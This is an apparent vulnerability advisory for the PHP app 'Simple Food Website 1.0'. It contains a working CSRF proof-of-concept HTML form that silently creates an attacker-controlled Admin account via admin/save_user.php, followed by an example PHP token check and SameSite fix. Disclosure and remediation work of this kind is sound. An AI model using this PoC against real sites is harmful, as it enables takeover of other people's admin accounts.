# Exploit Title: Simple Food Website 1.0 : Account Takeover via CSRF
### Date: 25-04-2022
### Exploit Author: Saket Saurav
### Vendor Homepage: https://www.sourcecodester.com/php/12510/simple-food-website-php.html
### Software Link: https://www.sourcecodester.com/download-code?nid=12510&title=Simple+Food+Website+%28CMS%29+in+PHP+with+Source+Code
### Version: 1.0
### Tested on: Kali Linux 2020
### Description: The admin endpoint `admin/save_user.php` creates or updates user accounts from a plain POST request with no anti-CSRF token. An attacker sends a specially crafted HTML page to the admin; if the admin opens it while logged in, the browser submits the form with the admin's session cookie, and a new account with the `Admin` position (controlled by the attacker) is created, taking over the admin role.
Below is the PoC (exploit.html):

```html
<html>
<!-- CSRF PoC - generated by saket saurav -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://127.0.0.1/food/admin/save_user.php" method="POST" enctype="multipart/form-data">
<input type="hidden" name="full_name" value="csrf user" />
<input type="hidden" name="username" value="csrf" />
<input type="hidden" name="password" value="csrf" />
<input type="hidden" name="position" value="Admin" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
```
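The root cause is that the endpoint accepts a state-changing POST on the strength of the session cookie alone, and browsers attach that cookie to a form submitted from any origin. The standard fix is a synchronizer token: a secret bound to the admin's session, embedded in every legitimate form and checked on every POST. A page on the attacker's origin cannot read that token, so its forged request fails. The following is an added example of such a check in PHP; it is not code from the Simple Food Website project, and the function names, field name `csrf_token` and the `SameSite` cookie settings are assumptions for illustration.

```php
<?php
// Added example (not the project's code): synchronizer-token protection for a
// state-changing admin endpoint such as the save_user.php request in the PoC.

// Defence in depth: a SameSite=Lax session cookie is not sent on cross-site
// top-level POSTs, which already blocks the PoC form in modern browsers.
// (Array form of session_set_cookie_params requires PHP >= 7.3.)
session_set_cookie_params([
    'httponly' => true,
    'secure'   => true,   // assumption: the portal is served over HTTPS
    'samesite' => 'Lax',
]);
session_start();

// Issue one unpredictable token per session and embed it in legitimate forms.
function csrf_token(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// Validate the submitted token before any change is made. hash_equals() is a
// constant-time comparison, so the check leaks nothing about the expected value.
function csrf_check(array $post): bool
{
    $expected = $_SESSION['csrf_token'] ?? '';
    $given    = $post['csrf_token'] ?? '';
    return $expected !== '' && is_string($given) && hash_equals($expected, $given);
}

if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    if (!csrf_check($_POST)) {
        // A forged request from another origin lands here: log it and stop.
        http_response_code(403);
        error_log('CSRF token mismatch on save_user from ' . ($_SERVER['REMOTE_ADDR'] ?? '?'));
        exit('Invalid request token');
    }
    // Only now is it safe to handle full_name / username / password / position,
    // still subject to the normal "is this session an admin?" authorisation check.
}
?>
<!-- The legitimate admin form carries the session-bound token. -->
<form action="save_user.php" method="POST">
  <input type="hidden" name="csrf_token"
         value="<?= htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8') ?>">
  <input type="text" name="full_name">
  <input type="text" name="username">
  <input type="password" name="password">
  <select name="position"><option>Staff</option><option>Admin</option></select>
  <button type="submit">Save</button>
</form>
```

The token check is the primary control and the `SameSite` attribute is a second layer: the former works regardless of browser version, the latter also covers any endpoint the developers forget to protect. Note that the PoC uses `enctype="multipart/form-data"`, which is a "simple" form submission that browsers send without a CORS preflight, which is exactly why a cookie-only authorisation scheme cannot tell it apart from a genuine admin action.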